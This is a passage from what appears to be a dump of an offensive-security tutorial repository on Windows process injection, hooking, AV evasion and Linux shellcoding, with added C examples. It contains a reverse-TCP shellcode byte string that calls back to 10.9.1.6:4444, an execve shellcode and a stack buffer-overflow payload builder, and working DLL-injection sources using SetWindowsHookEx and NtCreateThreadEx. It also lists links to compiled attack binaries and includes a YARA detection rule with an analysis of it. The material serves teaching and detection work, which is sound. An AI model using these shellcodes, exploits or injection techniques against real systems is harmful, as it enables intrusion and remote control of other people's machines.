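    printf("kernel32 base from mock PEB: 0x%08x\n", find_kernel32(peb));
    return 0;
}
```

The walk returns the third entry's DllBase (0x76f00000 in the mock). If any of the three constants is off, the mock returns zero or a link pointer instead of a base, which is the same failure a real shellcode would show as an access violation later.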
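The reverse TCP shellcode in 2021-10-17-linux-shellcoding-2/run.c carries its callback target as two immediates: `push imm32` for sin_addr and `push imm16` for sin_port, both already in network byte order. The function below is an added example, not repo code, that extracts the IP and port from that byte string by matching the instruction pair `68 a b c d 66 68 hi lo`. It is specific to that instruction sequence (other encoders push the address family and port together as one dword, which this matcher will not find), so treat it as a template for triaging this family of shellcode rather than a general decoder.

```c
/*
 * rev_c2.c - extract the callback IP:port from a linux/x86 reverse-TCP
 * shellcode that builds sockaddr_in with "push imm32 ; push imm16".
 * Added example, not part of the cocomelonc/meow repository.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* the shellcode from 2021-10-17-linux-shellcoding-2/run.c */
const uint8_t rev_sc[] =
    "\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66"
    "\x68\x0a\x09\x01\x06\x66\x68\x11\x5c\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89"
    "\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41"
    "\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";

/* Scan for "68 <4 bytes> 66 68 <2 bytes>": push imm32 (sin_addr) followed by push imm16 (sin_port).
   On a match, writes the dotted quad into ip (at least 16 bytes) and the host-order port; returns 1. */
int extract_c2(const uint8_t *sc, size_t n, char *ip, uint16_t *port) {
    for (size_t i = 0; i + 9 <= n; i++) {
        if (sc[i] != 0x68 || sc[i + 5] != 0x66 || sc[i + 6] != 0x68)
            continue;
        /* the four immediate bytes sit in memory in network order, so they read as the dotted quad */
        snprintf(ip, 16, "%u.%u.%u.%u", sc[i + 1], sc[i + 2], sc[i + 3], sc[i + 4]);
        /* the two-byte immediate is sin_port in network (big-endian) order */
        *port = (uint16_t)((sc[i + 7] << 8) | sc[i + 8]);
        return 1;
    }
    return 0;
}

int main(void) {
    char ip[16];
    uint16_t port;
    if (extract_c2(rev_sc, sizeof rev_sc - 1, ip, &port))
        printf("callback: %s:%u\n", ip, port);
    else
        puts("no push imm32 / push imm16 pair found");
    return 0;
}
```

For the run.c bytes this yields 10.9.1.6:4444 (0x0601090a pushed as `0a 09 01 06`, and 0x5c11 pushed as `11 5c`), which is what a listener would have to be waiting on for the shell to connect.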
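exploit.py in 2021-10-20-buffer-overflow-1 builds the stack-smashing payload for vuln.c from fixed numbers. The C builder below is an added example, not the repository's code: it makes the layout arithmetic explicit (padding, a 64-byte NOP sled, the shellcode, then the little-endian return address at offset 268, i.e. 272 - 4) and checks that the result contains no null byte, since the `strcpy()` in vuln.c would stop copying at one and the return address would never be overwritten. The 0xffffd3f4 return address is the value exploit.py uses and is only meaningful in that gdb session; the offset 268 likewise comes from exploit.py's 272-byte total.

```c
/*
 * payload.c - build the exploit.py payload for vuln.c and check the
 * properties strcpy() delivery depends on.
 * Added example, not part of the cocomelonc/meow repository.
 * usage: ./payload > p.bin ; ./vuln "$(cat p.bin)"
 */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* execve("/bin//sh") shellcode from exploit.py / run.c */
const uint8_t sh_sc[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68"
                        "\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80";

#define EIP_OFFSET   268   /* distance from buf[0] to the saved return address (272 - 4, per exploit.py) */
#define NOP_LEN      64
#define PAYLOAD_LEN  (EIP_OFFSET + 4)

/* Layout: [ 'A' * pad ][ NOP sled ][ shellcode ][ ret, little-endian ]
   Returns the payload length, or 0 if the buffer is too small or the shellcode does not fit. */
size_t build_payload(uint8_t *out, size_t cap, const uint8_t *sc, size_t sc_len, uint32_t ret) {
    if (cap < PAYLOAD_LEN || NOP_LEN + sc_len > EIP_OFFSET)
        return 0;
    size_t pad = EIP_OFFSET - NOP_LEN - sc_len;      /* 179 for the 25-byte shellcode */
    memset(out, 'A', pad);
    memset(out + pad, 0x90, NOP_LEN);                /* landing zone: ret may point anywhere in it */
    memcpy(out + pad + NOP_LEN, sc, sc_len);
    out[EIP_OFFSET + 0] = (uint8_t)(ret);            /* x86 is little-endian: low byte first */
    out[EIP_OFFSET + 1] = (uint8_t)(ret >> 8);
    out[EIP_OFFSET + 2] = (uint8_t)(ret >> 16);
    out[EIP_OFFSET + 3] = (uint8_t)(ret >> 24);
    return PAYLOAD_LEN;
}

/* strcpy() stops at the first 0x00, so nothing up to and including the return address may be null. */
int strcpy_safe(const uint8_t *p, size_t n) {
    return memchr(p, 0, n) == NULL;
}

int main(void) {
    uint8_t buf[PAYLOAD_LEN];
    size_t n = build_payload(buf, sizeof buf, sh_sc, sizeof sh_sc - 1, 0xffffd3f4u);
    if (n == 0 || !strcpy_safe(buf, n)) {
        fputs("payload does not fit or contains a null byte\n", stderr);
        return 1;
    }
    fwrite(buf, 1, n, stdout);
    return 0;
}
```

A return address such as 0x0804d3f4 would fail the null check (its top byte is zero), which is why non-PIE text addresses are awkward for strcpy-delivered payloads and stack addresses of the form 0xffffXXXX are used instead.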
/2021-11-11-malware-injection-3/README.md:
--------------------------------------------------------------------------------
# C++ Early Bird APC injection technique

Simple Early Bird APC injection technique. C++ example.

[https://cocomelonc.github.io/tutorial/2021/11/11/malware-injection-3.html](https://cocomelonc.github.io/tutorial/2021/11/11/malware-injection-3.html)
--------------------------------------------------------------------------------
/2021-11-11-malware-injection-3/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-11-malware-injection-3/evil.exe
--------------------------------------------------------------------------------
/2021-11-20-injection-4/README.md:
--------------------------------------------------------------------------------
# APC code injection via NtTestAlert

Simple APC code injection via the undocumented NtTestAlert. C++ example.

[https://cocomelonc.github.io/tutorial/2021/11/20/malware-injection-4.html](https://cocomelonc.github.io/tutorial/2021/11/20/malware-injection-4.html)
--------------------------------------------------------------------------------
/2021-11-20-injection-4/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-20-injection-4/hack.exe
--------------------------------------------------------------------------------
/2021-11-22-malware-injection-5/README.md:
--------------------------------------------------------------------------------
# APC code injection via alertable threads.

Simple APC code injection via alertable threads. C++ example.

[https://cocomelonc.github.io/tutorial/2021/11/22/malware-injection-5.html](https://cocomelonc.github.io/tutorial/2021/11/22/malware-injection-5.html)
--------------------------------------------------------------------------------
/2021-11-22-malware-injection-5/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-22-malware-injection-5/hack.exe
--------------------------------------------------------------------------------
/2021-11-23-malware-injection-6/README.md:
--------------------------------------------------------------------------------
# Classic code injection via thread hijacking

Simple code injection via thread hijacking instead of creating a new thread. C++ example.

[https://cocomelonc.github.io/tutorial/2021/11/23/malware-injection-6.html](https://cocomelonc.github.io/tutorial/2021/11/23/malware-injection-6.html)
--------------------------------------------------------------------------------
/2021-11-23-malware-injection-6/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-23-malware-injection-6/hack.exe
--------------------------------------------------------------------------------
/2021-11-24-malware-injection-7/README.md:
--------------------------------------------------------------------------------
# C++ DLL injection via SetWindowsHookEx

Simple classic DLL injection via SetWindowsHookEx. C++ malware example.

--------------------------------------------------------------------------------
/2021-11-24-malware-injection-7/evil.cpp:
--------------------------------------------------------------------------------
/*
evil.cpp
simple DLL for DLL inject to process
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2021/11/25/malware-injection-7.html
*/

#include <windows.h>
#pragma comment (lib, "user32.lib")

BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {
  switch (nReason) {
    case DLL_PROCESS_ATTACH:
      break;
    case DLL_PROCESS_DETACH:
      break;
    case DLL_THREAD_ATTACH:
      break;
    case DLL_THREAD_DETACH:
      break;
  }
  return TRUE;
}

// exported so that hack.cpp can resolve it with GetProcAddress and hand it to
// SetWindowsHookEx as the hook procedure
extern "C" __declspec(dllexport) int Meow() {
  MessageBox(
    NULL,
    "Meow from evil.dll!",
    "=^..^=",
    MB_OK
  );
  return 0;
}
--------------------------------------------------------------------------------
/2021-11-24-malware-injection-7/evil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-24-malware-injection-7/evil.dll
--------------------------------------------------------------------------------
/2021-11-24-malware-injection-7/hack.cpp:
--------------------------------------------------------------------------------
/*
hack.cpp
DLL inject via SetWindowsHookEx
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2021/11/25/malware-injection-7.html
*/
#include <windows.h>
#include <stdio.h>

typedef int (__cdecl *MeowProc)();

int main(void) {
  HINSTANCE meowDll;
  MeowProc meowFunc;
  // load evil DLL
  meowDll = LoadLibrary(TEXT("evil.dll"));
  if (meowDll == NULL) {
    printf("failed to load evil.dll\n");
    return 1;
  }

  // get the address of exported function from evil DLL
  meowFunc = (MeowProc) GetProcAddress(meowDll, "Meow");
  if (meowFunc == NULL) {
    printf("failed to find Meow\n");
    return 1;
  }

  // install the hook using the WH_KEYBOARD event. With dwThreadId = 0 the hook is
  // global: the system maps evil.dll into every process on this desktop that
  // receives keyboard input and calls Meow() there, which is the injection.
  // Meow() ignores the (nCode, wParam, lParam) arguments of a real HOOKPROC and
  // never calls CallNextHookEx, so other hooks in the chain are skipped while
  // this one is installed.
  HHOOK hook = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)meowFunc, meowDll, 0);
  Sleep(5*1000);
  UnhookWindowsHookEx(hook);

  return 0;
}
--------------------------------------------------------------------------------
/2021-11-24-malware-injection-7/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-24-malware-injection-7/hack.exe
--------------------------------------------------------------------------------
/2021-11-26-malware-injection-8/README.md:
--------------------------------------------------------------------------------
# Code injection to local process via Windows Fibers.

Code injection into the local process via Windows Fibers. Simple C++ malware code example.

[https://cocomelonc.github.io/tutorial/2021/11/28/malware-injection-8.html](https://cocomelonc.github.io/tutorial/2021/11/28/malware-injection-8.html)
--------------------------------------------------------------------------------
/2021-11-26-malware-injection-8/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-26-malware-injection-8/hack.exe
--------------------------------------------------------------------------------
/2021-11-30-basic-hooking-1/README.md:
--------------------------------------------------------------------------------
# Windows API hooking example

Simple code for the "classic" 5-byte hooking technique. C++ example.

[https://cocomelonc.github.io/tutorial/2021/11/30/basic-hooking-1.html](https://cocomelonc.github.io/tutorial/2021/11/30/basic-hooking-1.html)
--------------------------------------------------------------------------------
/2021-11-30-basic-hooking-1/cat.cpp:
--------------------------------------------------------------------------------
#include <windows.h>

typedef int (__cdecl *CatProc)(LPCTSTR say);
typedef int (__cdecl *BirdProc)(LPCTSTR say);

int main(void) {
  HINSTANCE petDll;
  CatProc catFunc;
  BirdProc birdFunc;
  BOOL freeRes;

  // the target of the hooking demo: a plain client of the Cat/Bird exports of pet.dll
  petDll = LoadLibrary("pet.dll");

  if (petDll != NULL) {
    catFunc = (CatProc) GetProcAddress(petDll, "Cat");
    birdFunc = (BirdProc) GetProcAddress(petDll, "Bird");
    if ((catFunc != NULL) && (birdFunc != NULL)) {
      (catFunc) ("meow-meow");
      (catFunc) ("mmmmeow");
      (birdFunc) ("tweet-tweet");
    }
    freeRes = FreeLibrary(petDll);
  }

  return 0;
}
--------------------------------------------------------------------------------
/2021-11-30-basic-hooking-1/cat.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-30-basic-hooking-1/cat.exe
--------------------------------------------------------------------------------
/2021-11-30-basic-hooking-1/example:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-30-basic-hooking-1/example
--------------------------------------------------------------------------------
/2021-11-30-basic-hooking-1/example.asm:
--------------------------------------------------------------------------------
; just normal exit
; author @cocomelonc
; nasm -f elf32 -o example.o example.asm
; ld -m elf_i386 -o example example.o
; 32-bit linux
; note: assembled as a Linux ELF only to look at the emitted bytes; the code
; itself only makes sense inside a 32-bit Windows process, since it jumps to
; an absolute kernel32.dll address (0x759279b0 is ExitProcess on the author's
; build and will differ on any other)

section .data

section .bss

section .text
global _start            ; must be declared for linker

; normal exit
_start:                  ; linker entry point
  xor eax, eax           ; zero out eax
  push ebp
  mov ebp, esp
  push eax               ; push NULL (the exit code argument)
  mov eax, 0x759279b0    ; ExitProcess function addr in kernel32.dll
  jmp eax                ; mov eax, imm32 / jmp eax: a stub that redirects execution to an absolute address
--------------------------------------------------------------------------------
/2021-11-30-basic-hooking-1/example.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-30-basic-hooking-1/example.o
--------------------------------------------------------------------------------
/2021-11-30-basic-hooking-1/hooking.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-30-basic-hooking-1/hooking.exe
--------------------------------------------------------------------------------
/2021-11-30-basic-hooking-1/hooking2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-30-basic-hooking-1/hooking2.exe
--------------------------------------------------------------------------------
/2021-11-30-basic-hooking-1/pet.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-11-30-basic-hooking-1/pet.dll
--------------------------------------------------------------------------------
/2021-12-03-inline-asm-1/hack.cpp:
--------------------------------------------------------------------------------
/*
hack.cpp
code inject via inline ASM
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2021/12/03/inline-asm-1.html
*/
#include <windows.h>
#include <stdio.h>

int main() {
  printf("=^..^= meow-meow. You are hacked =^..^=\n");
  // raw bytes emitted into the function body via GCC inline assembly:
  // four NOPs (0x90) followed by ret
  asm(".byte 0x90,0x90,0x90,0x90\n\t"
      "ret \n\t");
  return 0;
}
--------------------------------------------------------------------------------
/2021-12-03-inline-asm-1/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-03-inline-asm-1/hack.exe
--------------------------------------------------------------------------------
/2021-12-06-malware-injection-9/README.md:
--------------------------------------------------------------------------------
# DLL injection via NtCreateThreadEx.

Simple DLL injection via the undocumented NtCreateThreadEx. C++ malware example.

[https://cocomelonc.github.io/tutorial/2021/12/06/malware-injection-9.html](https://cocomelonc.github.io/tutorial/2021/12/06/malware-injection-9.html)
--------------------------------------------------------------------------------
/2021-12-06-malware-injection-9/evil.c:
--------------------------------------------------------------------------------
/*
DLL example for DLL injection via NtCreateThreadEx
author: @cocomelonc
https://cocomelonc.github.io/pentest/2021/12/06/malware-injection-9.html
*/

#include <windows.h>
#pragma comment (lib, "user32.lib")

// the payload runs from DllMain as soon as the DLL is mapped into the victim
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
  switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
      MessageBox(
        NULL,
        "Meow-meow!",
        "=^..^=",
        MB_OK
      );
      break;
    case DLL_PROCESS_DETACH:
      break;
    case DLL_THREAD_ATTACH:
      break;
    case DLL_THREAD_DETACH:
      break;
  }
  return TRUE;
}
--------------------------------------------------------------------------------
/2021-12-06-malware-injection-9/evil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-06-malware-injection-9/evil.dll
--------------------------------------------------------------------------------
/2021-12-06-malware-injection-9/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-06-malware-injection-9/hack.exe
--------------------------------------------------------------------------------
/2021-12-06-malware-injection-9/mouse.c:
--------------------------------------------------------------------------------
/*
Victim process example for DLL injection via NtCreateThreadEx
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2021/12/06/malware-injection-9.html
*/

#include <windows.h>
#pragma comment (lib, "user32.lib")

int main() {
  // the message box keeps the victim alive long enough to inject into it
  MessageBox(NULL, "Squeak-squeak!", "<:( )~~", MB_OK);
  return 0;
}
--------------------------------------------------------------------------------
/2021-12-06-malware-injection-9/mouse.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-06-malware-injection-9/mouse.exe
--------------------------------------------------------------------------------
/2021-12-07-malware-injection-10/README.md:
--------------------------------------------------------------------------------
# Code injection via NtAllocateVirtualMemory.

Classic code injection via the undocumented NtAllocateVirtualMemory. C++ malware example.

[https://cocomelonc.github.io/tutorial/2021/12/07/malware-injection-10.html](https://cocomelonc.github.io/tutorial/2021/12/07/malware-injection-10.html)
--------------------------------------------------------------------------------
/2021-12-07-malware-injection-10/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-07-malware-injection-10/hack.exe
--------------------------------------------------------------------------------
/2021-12-11-malware-injection-11/README.md:
--------------------------------------------------------------------------------
# Code injection via NT API functions.

Simple injection technique via NT API functions. C++ malware example.

[https://cocomelonc.github.io/tutorial/2021/12/11/malware-injection-11.html](https://cocomelonc.github.io/tutorial/2021/12/11/malware-injection-11.html)
--------------------------------------------------------------------------------
/2021-12-11-malware-injection-11/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-11-malware-injection-11/hack.exe
--------------------------------------------------------------------------------
/2021-12-13-malware-injection-12/README.md:
--------------------------------------------------------------------------------
# Code injection via sections technique.

Simple injection via the NT API functions NtCreateSection, NtMapViewOfSection and RtlCreateUserThread. C++ malware example.

[https://cocomelonc.github.io/tutorial/2021/12/13/malware-injection-12.html](https://cocomelonc.github.io/tutorial/2021/12/13/malware-injection-12.html)
--------------------------------------------------------------------------------
/2021-12-13-malware-injection-12/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-13-malware-injection-12/hack.exe
--------------------------------------------------------------------------------
/2021-12-21-simple-malware-av-evasion-3/README.md:
--------------------------------------------------------------------------------
# AV engines evasion techniques - part 3.

AV engine evasion techniques and tricks: allocating too much memory, checking machine resources, IsDebuggerPresent, checking whether NUMA memory allocation works, etc. Simple C++ malware example.

[https://cocomelonc.github.io/tutorial/2021/12/25/simple-malware-av-evasion-3.html](https://cocomelonc.github.io/tutorial/2021/12/25/simple-malware-av-evasion-3.html)
--------------------------------------------------------------------------------
/2021-12-21-simple-malware-av-evasion-3/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-21-simple-malware-av-evasion-3/hack.exe
--------------------------------------------------------------------------------
/2021-12-21-simple-malware-av-evasion-3/hack2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2021-12-21-simple-malware-av-evasion-3/hack2.exe
--------------------------------------------------------------------------------
/2022-01-14-malware-injection-13/README.md:
--------------------------------------------------------------------------------
# Code injection via ZwCreateSection (sections technique).

Simple injection via the NT API functions ZwCreateSection, NtMapViewOfSection and ZwCreateThreadEx. C++ malware example.

[https://cocomelonc.github.io/tutorial/2022/01/14/malware-injection-13.html](https://cocomelonc.github.io/tutorial/2022/01/14/malware-injection-13.html)

--------------------------------------------------------------------------------
/2022-01-14-malware-injection-13/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-01-14-malware-injection-13/hack.exe
--------------------------------------------------------------------------------
/2022-01-17-malware-injection-14/README.md:
--------------------------------------------------------------------------------
# Code injection via memory sections and ZwQueueApcThread.

Simple injection via the NT API functions ZwCreateSection, NtMapViewOfSection, ZwQueueApcThread and ZwSetInformationThread. C++ malware example.

[https://cocomelonc.github.io/tutorial/2022/01/17/malware-injection-14.html](https://cocomelonc.github.io/tutorial/2022/01/17/malware-injection-14.html)

--------------------------------------------------------------------------------
/2022-01-17-malware-injection-14/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-01-17-malware-injection-14/hack.exe
--------------------------------------------------------------------------------
/2022-01-24-malware-injection-15/README.md:
--------------------------------------------------------------------------------
# Code injection via KernelCallbackTable.

Simple process injection by spoofing the `fnCOPYDATA` value in `KernelCallbackTable`. C++ malware implementation example.

[https://cocomelonc.github.io/tutorial/2022/01/24/malware-injection-15.html](https://cocomelonc.github.io/tutorial/2022/01/24/malware-injection-15.html)

--------------------------------------------------------------------------------
/2022-01-24-malware-injection-15/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-01-24-malware-injection-15/hack.exe
--------------------------------------------------------------------------------
/2022-02-01-malware-injection-16/README.md:
--------------------------------------------------------------------------------
# Process injection via RWX-memory hunting.

Simple process injection: enumerate processes, hunt for an existing RWX memory region and inject the payload into it. C++ malware implementation example.

[https://cocomelonc.github.io/tutorial/2022/02/01/malware-injection-16.html](https://cocomelonc.github.io/tutorial/2022/02/01/malware-injection-16.html)

--------------------------------------------------------------------------------
/2022-02-01-malware-injection-16/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-02-01-malware-injection-16/hack.exe
--------------------------------------------------------------------------------
/2022-02-07-mem-forensics-1/.gitignore:
--------------------------------------------------------------------------------
/dump
--------------------------------------------------------------------------------
/2022-02-07-mem-forensics-1/README.md:
--------------------------------------------------------------------------------
# Basic memory forensics with Volatility.

Simple memory forensics with Volatility. C++ malware example: process injection technique.

[https://cocomelonc.github.io/tutorial/2022/02/07/mem-forensics-1.html](https://cocomelonc.github.io/tutorial/2022/02/07/mem-forensics-1.html)

--------------------------------------------------------------------------------
/2022-02-07-mem-forensics-1/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-02-07-mem-forensics-1/hack.exe
--------------------------------------------------------------------------------
/2022-02-15-malware-analysis-3/README.md:
--------------------------------------------------------------------------------
# Malware analysis part 3. Threat hunting with Yara.

Threat hunting via YARA rules. C++ malware example: classic process injection technique.

[https://cocomelonc.github.io/tutorial/2022/02/15/malware-analysis-3.html](https://cocomelonc.github.io/tutorial/2022/02/15/malware-analysis-3.html)

--------------------------------------------------------------------------------
/2022-02-15-malware-analysis-3/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-02-15-malware-analysis-3/hack.exe
--------------------------------------------------------------------------------
/2022-02-15-malware-analysis-3/meow.yar:
--------------------------------------------------------------------------------
rule meow {
  meta:
    author = "cocomelonc"
    category = "test"
    description = "test rule for meow-meow messagebox"

  strings:
    $a = "meow"
    $b = {4D 65 6F 77 2D 6D 65 6F 77}
    $mz = {4D 5A}

  condition:
    ($mz at 0x00) and ($a or $b)
}
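--------------------------------------------------------------------------------
What meow.yar actually matches is easy to misjudge: `$b` is the bytes of `Meow-meow`, which itself contains `meow`, so every `$b` hit is also an `$a` hit and `($a or $b)` collapses to `$a`; and YARA text strings are case-sensitive unless marked `nocase`, so a binary whose only cat string is `Meow from evil.dll!` (the MessageBox text of the evil.dll in this repository) is not matched at all. The following C program is an added example, not part of the repository: it re-implements the rule's condition by hand and evaluates it, with and without `nocase` on `$a`, against constructed byte buffers (a DOS-header stub followed by text; these are not real binaries).

```c
/* meow_scan.c: added example, not part of the repository. Re-implements the
 * logic of meow.yar in plain C on constructed buffers to show exactly what each
 * string in the rule does and does not match. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* the three strings of meow.yar, as bytes */
static const unsigned char STR_MZ[] = { 0x4D, 0x5A };                     /* $mz */
static const unsigned char STR_A[]  = { 'm', 'e', 'o', 'w' };             /* $a, case-sensitive */
static const unsigned char STR_B[]  = { 0x4D, 0x65, 0x6F, 0x77, 0x2D,
                                        0x6D, 0x65, 0x6F, 0x77 };         /* $b, "Meow-meow" */

/* byte-exact substring search (memmem is not portable C) */
static int has_bytes(const unsigned char *buf, size_t n, const unsigned char *pat, size_t m) {
  if (n < m) return 0;
  for (size_t i = 0; i + m <= n; i++)
    if (memcmp(buf + i, pat, m) == 0) return 1;
  return 0;
}

/* what a "nocase" text string does: ASCII case-folded comparison */
static int has_bytes_nocase(const unsigned char *buf, size_t n, const unsigned char *pat, size_t m) {
  if (n < m) return 0;
  for (size_t i = 0; i + m <= n; i++) {
    size_t k = 0;
    while (k < m && tolower(buf[i + k]) == tolower(pat[k])) k++;
    if (k == m) return 1;
  }
  return 0;
}

/* condition of meow.yar: ($mz at 0x00) and ($a or $b) */
int rule_meow(const unsigned char *buf, size_t n) {
  int mz_at_0 = n >= 2 && memcmp(buf, STR_MZ, 2) == 0;
  int a = has_bytes(buf, n, STR_A, sizeof STR_A);
  int b = has_bytes(buf, n, STR_B, sizeof STR_B);
  return mz_at_0 && (a || b);
}

/* the same rule if $a were declared as  $a = "meow" nocase */
int rule_meow_nocase(const unsigned char *buf, size_t n) {
  int mz_at_0 = n >= 2 && memcmp(buf, STR_MZ, 2) == 0;
  int a = has_bytes_nocase(buf, n, STR_A, sizeof STR_A);
  int b = has_bytes(buf, n, STR_B, sizeof STR_B);
  return mz_at_0 && (a || b);
}

/* constructed samples, not real binaries: "MZ" plus a few header bytes, then text */
#define DOS_STUB "MZ\x90\x00\x03\x00\x00\x00"
static const unsigned char SAMPLE_HIT[]  = DOS_STUB "=^..^= Meow-meow!";   /* $b hits, and $a via "-meow" */
static const unsigned char SAMPLE_CASE[] = DOS_STUB "Meow from evil.dll!"; /* "Meow": neither $a nor $b */
static const unsigned char SAMPLE_NOMZ[] = "PK\x03\x04" "meow-meow";       /* $a hits, but no MZ at 0 */

int main(void) {
  printf("Meow-meow! sample:       %d\n", rule_meow(SAMPLE_HIT, sizeof SAMPLE_HIT - 1));
  printf("evil.dll string sample:  %d (with nocase: %d)\n",
         rule_meow(SAMPLE_CASE, sizeof SAMPLE_CASE - 1),
         rule_meow_nocase(SAMPLE_CASE, sizeof SAMPLE_CASE - 1));
  printf("non-PE sample:           %d\n", rule_meow(SAMPLE_NOMZ, sizeof SAMPLE_NOMZ - 1));
  return 0;
}
```

`sizeof SAMPLE - 1` passes the buffer length without the terminating NUL; the samples contain embedded zero bytes, so `strlen` would stop early. A rule that is supposed to catch the MessageBox strings of both binaries in this repository needs either `nocase` on `$a` or a second text string for `Meow`.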
--------------------------------------------------------------------------------
/2022-02-23-malware-analysis-4/README.md:
--------------------------------------------------------------------------------
# Malware analysis part 4: VirusTotal API v3

Simple Python script that uploads a file to VirusTotal via API v3 and fetches its score.

[https://cocomelonc.github.io/tutorial/2022/02/23/malware-analysis-4.html](https://cocomelonc.github.io/tutorial/2022/02/23/malware-analysis-4.html)
--------------------------------------------------------------------------------
/2022-02-23-malware-analysis-4/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-02-23-malware-analysis-4/hack.exe
--------------------------------------------------------------------------------
/2022-02-23-malware-analysis-4/requirements.txt:
--------------------------------------------------------------------------------
requests==2.27.1
--------------------------------------------------------------------------------
/2022-03-08-basic-hooking-2/README.md:
--------------------------------------------------------------------------------
# Windows API hooking part 2.

Simple Windows API hooking via the `push, retn` technique. C++ implementation example.

[https://cocomelonc.github.io/tutorial/2022/03/08/basic-hooking-2.html](https://cocomelonc.github.io/tutorial/2022/03/08/basic-hooking-2.html)

--------------------------------------------------------------------------------
/2022-03-08-basic-hooking-2/hooking.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-08-basic-hooking-2/hooking.exe
--------------------------------------------------------------------------------
/2022-03-08-basic-hooking-2/pet.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-08-basic-hooking-2/pet.dll
--------------------------------------------------------------------------------
/2022-03-14-malware-injection-17/hack.exe:
--------------------------------------------------------------------------------
